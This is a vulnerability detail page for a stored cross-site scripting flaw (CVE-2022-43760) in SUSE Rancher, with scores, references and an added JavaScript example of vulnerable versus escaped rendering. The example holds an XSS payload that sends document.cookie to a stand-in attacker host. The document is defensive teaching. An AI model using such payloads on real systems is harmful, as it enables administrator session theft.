Vulnerability Details : CVE-2022-43760
An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SUSE Rancher allows users in some higher-privileged groups to inject code that is executed within another user's browser, allowing the attacker to steal sensitive information, manipulate web content, or perform other malicious activities on behalf of the victim. As a result, a user with write access to the affected areas can act on behalf of an administrator once the administrator opens the affected web page.
This issue affects Rancher from 2.6.0 before 2.6.13 and from 2.7.0 before 2.7.4.
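The following is an added illustration of the vulnerability class described above (stored cross-site scripting in a management UI rendered by an administrator). It is not Rancher's code and does not reproduce the actual affected Rancher pages: the "resource name" field, the table-cell template and the attacker payload are all constructed for this example. It contrasts the vulnerable pattern (user-controlled text concatenated into markup) with output escaping at the rendering boundary, and includes a small regression check that flags any tag surviving outside the hard-coded template.

```javascript
// Added example (not Rancher's code). Runs under Node.js; both renderers build an
// HTML string, so no DOM is needed to observe the difference.

// Constructed attacker input: a value a lower-privileged user could store in a
// hypothetical "name" field that an administrator's browser later renders.
// If it lands in the page unescaped, the handler runs with the admin's session.
const ATTACKER_VALUE =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable pattern: user-controlled data is interpolated into markup verbatim.
function renderVulnerable(name) {
  return `<td class="name">${name}</td>`;
}

// Escaping for HTML text and double-quoted attribute contexts: the five characters
// that can break out of those contexts are replaced by character references.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened pattern: escape at the output boundary, for the context the data lands in.
// (Template engines such as Vue's {{ }} do this automatically; the bug class appears
// when raw-HTML bindings or string concatenation bypass that escaping.)
function renderSafe(name) {
  return `<td class="name">${escapeHtml(name)}</td>`;
}

// Regression check for a UI test suite: list every tag name in the rendered
// fragment that is not part of the template's own allowlist. An empty result
// means no user-supplied markup survived as markup.
function injectedTags(html, allowed = ['td']) {
  const found = [];
  for (const m of html.matchAll(/<\/?([a-zA-Z][\w-]*)/g)) {
    const tag = m[1].toLowerCase();
    if (!allowed.includes(tag)) found.push(tag);
  }
  return found;
}

console.log('vulnerable:', renderVulnerable(ATTACKER_VALUE));
console.log('injected tags:', injectedTags(renderVulnerable(ATTACKER_VALUE)));
console.log('safe:      ', renderSafe(ATTACKER_VALUE));
console.log('injected tags:', injectedTags(renderSafe(ATTACKER_VALUE)));
```

The check deliberately scans for real `<` characters only: escaped text such as `&lt;img` is inert to the HTML parser, so it is correctly ignored. Escaping must match the output context; a value placed inside a JavaScript block or a URL attribute needs different encoding than this HTML-text escaper provides.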
Vulnerability category: Cross site scripting (XSS)
Products affected by CVE-2022-43760
- cpe:2.3:a:suse:rancher:*:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2022-43760
- EPSS score: 0.10% (probability of exploitation activity in the next 30 days)
- EPSS percentile: ~41% (the proportion of vulnerabilities scored at or below this one)
CVSS scores for CVE-2022-43760
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen
---|---|---|---|---|---|---
8.4 | HIGH | CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H | 1.7 | 6.0 | SUSE | 
8.4 | HIGH | CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H | 1.7 | 6.0 | NIST | 
Both sources agree on the vector: the attack is network-reachable and low-complexity, but it requires an attacker who already holds high privileges (PR:H) and a victim who opens the affected page (UI:R). Scope is changed (S:C) because the injected script executes in the administrator's session rather than the attacker's own.
CWE ids for CVE-2022-43760
- The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. (Assigned by: meissner@suse.de, Primary)
References for CVE-2022-43760
- https://bugzilla.suse.com/show_bug.cgi?id=CVE-2022-43760
  1205292 – (CVE-2022-43760) VUL-0: CVE-2022-43760: Rancher: Multiple XSS issues (Issue Tracking; Vendor Advisory)
- https://github.com/rancher/rancher/security/advisories/GHSA-46v3-ggjg-qq3x
  Multiple Cross-Site Scripting (XSS) issues in Rancher UI · Advisory · rancher/rancher · GitHub (Vendor Advisory)